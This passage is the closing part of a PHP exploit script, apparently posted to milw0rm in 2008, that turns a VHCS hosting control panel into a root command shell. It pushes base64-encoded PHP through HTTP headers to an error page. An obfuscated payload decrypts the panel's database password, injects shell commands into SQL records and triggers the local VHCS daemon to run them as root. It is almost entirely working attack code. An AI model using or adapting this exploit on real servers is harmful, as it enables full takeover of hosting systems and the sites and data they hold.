		# open_basedir always set
		if(ereg('safe_mode=on', $this->getcontent()))
		{
			$this->msg("We'll have to bypass open_basedir cause safe_mode=On", 0);

			$this->safe_mode = TRUE;
		}
		else
		{
			$this->msg('PHP configured with default safe_mode value (Off)', 0);

			$this->safe_mode = FALSE;
		}

		return $this->safe_mode;
	}

	function exec_cmd()
	{
		$this->msg("Now you can execute commands as root =]", 1);

		$this->woot_code =
		 'PD9waHAKCi8qCm1haWwoJ2xlZXRAcHduZWQuY29tJywgJ3Z1bG'
		.'5lcmFibGUgdmhjcyBob3N0ICEnLCAndGh4IHRvIHRoZSBzayAh'
		.'IHZoY3MgdnVsbiBob3N0OiAnLiRfU0VSVkVSWydSRU1PVEVfQU'
		.'REUiddKTsKdGhpcyBpcyBhIGpva2UgPVAgd2hlbiB5b3UgdXNl'
		.'IGVuY29kZWQgcGhwIGNvZGUsIHNlZSB3aGF0IGlzIGl0IGJlZm'
		.'9yZSB1c2luZyBpdCA9KQoqLwokdmFsaWRfdiA9ICdIVFRQX1NQ'
		.'TE9JVF8nOwoKZm9yZWFjaCgkX1NFUlZFUiBhcyAkaGVhZGVyID'
		.'0+ICR2YWx1ZSkKewoJaWYoIWlzX2FycmF5KCR2YWx1ZSkpCgl7'
		.'CgkJJHZhbHVlID0gYmFzZTY0X2RlY29kZSgkdmFsdWUpOwoKCQ'
		.'lpZihlcmVnKCR2YWxpZF92LCRoZWFkZXIpKQoJCXsKCQkJaWYo'
		.'ZXJlZygnUEhQX0tFWVMnLCAkaGVhZGVyKSkKCQkJICAgZXZhbC'
		.'gkdmFsdWUpOwoKCQkJZWxzZQoJCQl7CgkJCQkkdmFyX24gID0g'
		.'c3RydG9sb3dlcihzdHJfcmVwbGFjZSgkdmFsaWRfdiwnJywgJG'
		.'hlYWRlcikpOwoJCQkJJCR2YXJfbiA9ICR2YWx1ZTsKCQkJfQoJ'
		.'CX0KCX0KfQoKbXlzcWxfY29ubmVjdCgkZGJfaG9zdCwkZGJfdX'
		.'NlcixkZWNyeXB0X2RiX3Bhc3N3b3JkKCRkYl9wYXNzKSk7Cm15'
		.'c3FsX3NlbGVjdF9kYigkZGJfbmFtZSk7CgokZmlsZSA9IGFkZH'
		.'NsYXNoZXMoJGZpbGUpOwokY21kICA9IGFkZHNsYXNoZXMoJGNt'
		.'ZCk7CiRWZXJzaW9uID0gJHZlcnNpb247CgokYWRkID0gYXJyYX'
		.'koKTsKJGFkZFtdID0gCiJJTlNFUlQgSU5UTyBkb21haW4gKGBk'
		.'b21haW5fbmFtZWAsYGRvbWFpbiIuCiJfZ2lkYCxgZG9tYWluX3'
		.'VpZGAsYGRvbWFpbl9hZG1pbl9pZGAsYGRvbSIuCiJhaW5fY3Jl'
		.'YXRlZF9pZGAsYGRvbWFpbl9jcmVhdGVkYCxgZG9tYWluXyIuCi'
		.'JsYXN0X21vZGlmaWVkYCxgZG9tYWluX21haWxhY2NfbGltaXRg'
		.'LGBkbyIuCiJtYWluX2Z0cGFjY19saW1pdGAsYGRvbWFpbl90cm'
		.'FmZmljX2xpbWl0YCIuCiIsYGRvbWFpbl9zcWxkX2xpbWl0YCxg'
		.'ZG9tYWluX3NxbHVfbGltaXRgLCIuCiJgZG9tYWluX3N0YXR1c2'
		.'AsYGRvbWFpbl9hbGlhc19saW1pdGAsYGRvbSIuCiJhaW5fc3Vi'
		.'ZF9saW1pdGAsYGRvbWFpbl9pcF9pZGAsYGRvbWFpbl9kaSIuCi'
		.'Jza19saW1pdGAsYGRvbWFpbl9kaXNrX3VzYWdlYCxgZG9tYWlu'
		.'X3BocCIuCiJgLGBkb21haW5fY2dpYCkgVkFMVUVTICgnZGVsZX'
		.'RlbWViaWF0Y2g7JGNtZCIuCiIgPiAkZmlsZTtybSAvdG1wL2h0'
		.'YWNjZXNzLXVzZXItY2YtZGVsZXRlbSIuCiJlYmlhdGNoO2VjaG'
		.'8gMSMnLCcwJywgJzAnLCAnLTEnLCAnLTEnLCAnMCIuCiInLCAn'
		.'MCcsICcwJywgJzAnLCAnMCcsICcwJywgJzAnLCdvaycsICcwJy'
		.'IuCiIsJzAnLCAnLTEnLCAnMCcsICcwJywgJ3llcycsICd5ZXMn'
		.'KSI7CgokYWRkW10gPQoiSU5TRVJUIElOVE8gaHRhY2Nlc3MgKG'
		.'BkbW5faWRgLGB1c2VyX2lkYCwiLgoiYGdyb3VwX2lkYCxgYXV0'
		.'aF90eXBlYCxgYXV0aF9uYW1lYCxgcGF0aGAiLgoiLGBzdGF0dX'
		.'NgKSBWQUxVRVMgKChTRUxFQ1QgZG9tYWluX2lkIEZST00iLgoi'
		.'IGRvbWFpbiBXSEVSRSBkb21haW5fbmFtZSBMSUtFICclJGZpbG'
		.'UlJykiLgoiLC0xLDAsJ0Jhc2ljJywnaHVodScsJy90bXAnLCd0'
		.'b2FkZCcpIjsKCmV4ZWNfc3FsKCRhZGQpOwoKc2VuZF9yZXF1ZX'
		.'N0KCk7CnNsZWVwKCRzbGVlcF90aW1lKTsKcHJpbnQoZmlsZV9n'
		.'ZXRfY29udGVudHMoJGZpbGUpKTsKdW5saW5rKCRmaWxlKTsKCi'
		.'RkZWwgPSBhcnJheSgpOwokZGVsW10gPSAKIkRFTEVURSBGUk9N'
		.'IGh0YWNjZXNzIFdIRVJFIGRtbl9pZCA9IChTRUxFQyIuCiJUIG'
		.'RvbWFpbl9pZCBGUk9NIGRvbWFpbiBXSEVSRSBkb21haW5fbmFt'
		.'ZSAiLgoiTElLRSAnJSRmaWxlJScpIjsKCiRkZWxbXSA9CiJERU'
		.'xFVEUgRlJPTSBkb21haW4gV0hFUkUgZG9tYWluX25hbWUgTElL'
		.'RSAiLgoiJyUkZmlsZSUnIjsKCmV4ZWNfc3FsKCRkZWwpOwoKZn'
		.'VuY3Rpb24gZXhlY19zcWwoJHNxbF9hcnIpCnsKCWZvcmVhY2go'
		.'JHNxbF9hcnIgYXMgJHNxbF9xKQoJICAgbXlzcWxfcXVlcnkoJH'
		.'NxbF9xKSB8fCBkaWUobXlzcWxfZXJyb3IoKSk7CgoJcmV0dXJu'
		.'Owp9CgovLyB2aGNzCmZ1bmN0aW9uIGRlY3J5cHRfZGJfcGFzc3'
		.'dvcmQgKCRkYl9wYXNzKSB7CgogICAgIGdsb2JhbCAkdmhjczJf'
		.'ZGJfcGFzc19rZXk7CiAgICAgZ2xvYmFsICR2aGNzMl9kYl9wYX'
		.'NzX2l2OwogICAgICAgICAgIAogICAgJHRleHQgPSBiYXNlNjRf'
		.'ZGVjb2RlKCIkZGJfcGFzc1xuIik7CiAgICAKICAgIC8qIE9wZW'
		.'4gdGhlIGNpcGhlciAqLwogICAgJHRkID0gbWNyeXB0X21vZHVs'
		.'ZV9vcGVuICgnYmxvd2Zpc2gnLCAnJywgJ2NiYycsICcnKTsKIC'
		.'AgIAogICAgLyogQ3JlYXRlIGtleSAqLwogICAgICAgICRrZXkg'
		.'PSAkdmhjczJfZGJfcGFzc19rZXk7CiAgICAKICAgIC8qIENyZW'
		.'F0ZSB0aGUgSVYgYW5kIGRldGVybWluZSB0aGUga2V5c2l6ZSBs'
		.'ZW5ndGggKi8KICAgICAgICAkaXYgPSAkdmhjczJfZGJfcGFzc1'
		.'9pdjsKICAgICAgCiAgICAvKiBJbnRpYWxpemUgZW5jcnlwdGlv'
		.'biAqLyAgICAgICAgICAgICAgICAgICAgCiAgICBtY3J5cHRfZ2'
		.'VuZXJpY19pbml0ICgkdGQsICRrZXksICRpdik7CiAgICAgICAg'
		.'ICAgICAgICAgICAgICAKICAgIC8qIERlY3J5cHQgZW5jcnlwdG'
		.'VkIHN0cmluZyAqLyAgICAKICAgICRkZWNyeXB0ZWQgPSBtZGVj'
		.'cnlwdF9nZW5lcmljICgkdGQsICR0ZXh0KTsKICAgICAgICAgIC'
		.'AgICAgICAgICAgICAgICAKICAgIG1jcnlwdF9tb2R1bGVfY2xv'
		.'c2UgKCR0ZCk7CiAgICAgICAgICAgICAgICAgICAgICAgICAgIC'
		.'AgICAgCiAgICAvKiBTaG93IHN0cmluZyAqLyAgICAgICAgICAg'
		.'ICAgICAgICAgICAgICAgICAgICAgICAKICAgIHJldHVybiB0cm'
		.'ltKCRkZWNyeXB0ZWQpOwp9CgovLyB2aGNzCmZ1bmN0aW9uIHNl'
		.'bmRfcmVxdWVzdCgpIHsKCiAgICBnbG9iYWwgJFZlcnNpb24sIC'
		.'RWZXJzaW9uSCwgJEJ1aWxkRGF0ZTsKCiAgICBAJHNvY2tldCA9'
		.'IHNvY2tldF9jcmVhdGUgKEFGX0lORVQsIFNPQ0tfU1RSRUFNLC'
		.'AwKTsKCiAgICBpZiAoJHNvY2tldCA8IDApIHsKICAgICAgICAk'
		.'ZXJybm8gPSAgInNvY2tldF9jcmVhdGUoKSBmYWlsZWQuXG4iOw'
		.'ogICAgICAgIHJldHVybiAkZXJybm87CiAgICB9CgogICAgQCRy'
		.'ZXN1bHQgPSBzb2NrZXRfY29ubmVjdCAoJHNvY2tldCwgIjEyNy'
		.'4wLjAuMSIsIDk4NzYpOwogICAgaWYgKCRyZXN1bHQgPT0gRkFM'
		.'U0UpIHsKICAgICAgICAkZXJybm8gPSAgInNvY2tldF9jb25uZW'
		.'N0KCkgZmFpbGVkLlxuIjsKICAgICAgICByZXR1cm4gJGVycm5v'
		.'OwogICAgfQoKICAgIC8qIHJlYWQgb25lIGxpbmUgd2l0aCB3ZW'
		.'xjb21lIHN0cmluZyAqLwogICAgJG91dCA9IHJlYWRfbGluZSgk'
		.'c29ja2V0KTsKCiAgICAvKiBzZW5kIGhlbGxvIHF1ZXJ5ICovCi'
		.'AgICAkcXVlcnkgPSAiaGVsbyAgJFZlcnNpb25cclxuIjsKICAg'
		.'IHNvY2tldF93cml0ZSAoJHNvY2tldCwgJHF1ZXJ5LCBzdHJsZW'
		.'4gKCRxdWVyeSkpOwoKICAgIC8qIHJlYWQgb25lIGxpbmUgd2l0'
		.'aCBoZWxvIGFuc3dlciAqLwogICAgJG91dCA9IHJlYWRfbGluZS'
		.'gkc29ja2V0KTsKCiAgICAvKiBzZW5kIHJlZyBjaGVjayBxdWVy'
		.'eSAqLwogICAgJHF1ZXJ5ID0gImV4ZWN1dGUgcXVlcnlcclxuIj'
		.'sKICAgIHNvY2tldF93cml0ZSAoJHNvY2tldCwgJHF1ZXJ5LCBz'
		.'dHJsZW4gKCRxdWVyeSkpOwogICAgLyogcmVhZCBvbmUgbGluZS'
		.'BrZXkgcmVwbGF5ICovCiAgICAkZXhlY3V0ZV9yZXBsYXkgPSBy'
		.'ZWFkX2xpbmUoJHNvY2tldCk7CgogICAgLyogc2VuZCBxdWl0IH'
		.'F1ZXJ5ICovCiAgICAkcXVpdF9xdWVyeSA9ICJieWVcclxuIjsK'
		.'ICAgIHNvY2tldF93cml0ZSAoJHNvY2tldCwgJHF1aXRfcXVlcn'
		.'ksIHN0cmxlbiAoJHF1aXRfcXVlcnkpKTsKICAgIC8qIHJlYWQg'
		.'cXVpdCBhbnN3ZXIgKi8KICAgICRxdWl0X3JlcGxheSA9IHJlYW'
		.'RfbGluZSgkc29ja2V0KTsKCiAgICAvKiBhbmFseXplIGtleSBy'
		.'ZXBsYXkgKi8KICAgICRhbnN3ZXIgPSAkZXhlY3V0ZV9yZXBsYX'
		.'k7CgogICAgLyogY2xvc2Ugc29ja2V0ICovCiAgICBzb2NrZXRf'
		.'Y2xvc2UgKCRzb2NrZXQpOwoKICAgIC8qIHJldHVybiBmdW5jdG'
		.'lvbiByZXN1bHQgKi8KICAgIHJldHVybiAkYW5zd2VyOwoKfQoK'
		.'Ly8gdmhjcwpmdW5jdGlvbiByZWFkX2xpbmUoJHNvY2tldCkgew'
		.'0KICAgICRjaCA9ICcnOw0KICAgICRsaW5lID0gJyc7DQogICAg'
		.'ZG97DQogICAgICAgICRjaCA9IHNvY2tldF9yZWFkKCRzb2NrZX'
		.'QsMSk7DQogICAgICAgICRsaW5lID0gJGxpbmUgLiAkY2g7DQog'
		.'ICAgfSB3aGlsZSgkY2ggIT0gIlxyIik7DQogICAgcmV0dXJuIC'
		.'RsaW5lOw0KfQo/Pgo=';

 		while($this->cmd_prompt())
		{
			$this->exec_php('print $_SERVER["DOCUMENT_ROOT"];');
			$this->tmp_file = $this->getcontent().'/'.md5(rand());

			$this->set_hvar('db-host',    $this->conf['DATABASE_HOST']);
			$this->set_hvar('db-user',    $this->conf['DATABASE_USER']);
			$this->set_hvar('db-pass',    $this->conf['DATABASE_PASSWORD']);
			$this->set_hvar('db-name',    $this->conf['DATABASE_NAME']);

			$this->set_hvar('sleep-time', $this->sleep_time);
			$this->set_hvar('file',       $this->tmp_file);
			$this->set_hvar('cmd',        $this->cmd);
			$this->set_hvar('version',    $this->conf['Version']);
			
			$this->set_hvar('php-keys',   '?>'.$this->php_keys_code);

			$this->exec_php('?>'.base64_decode($this->woot_code));

			print "\n".$this->getcontent();
		}

		exit(0);
	}

	function set_hvar($name, $value)
	{
		$this->addheader('Sploit-'.$name, base64_encode($value));

		return;
	}

	function cmd_prompt()
	{
		$this->msg('root@'.$this->usr.': ', 1);
		$this->cmd = trim(fgets(STDIN));

		if(!ereg('^(quit|exit)$', $this->cmd))
		   return TRUE;

		else
		   return FALSE;
	}

	function exec_php($php)
	{
		$this->addheader('Shell', base64_encode($php));
		$this->get($this->dmn_url.'/errors/404/index.php');

		return;
	}

	function msg($msg, $flag, $action=0)
	{
		print "\n ".$this->flags[$flag]."\x20".$msg;

		switch($action)
		{
			case 1:
				print "\n";
				return $this->usage();
			break;

			case 2:
				print "\n";
				exit(1);
			break;
		}
	}
}

$spl = new vhcs_xpl;
$spl->main();

?>

# milw0rm.com [2008-03-09]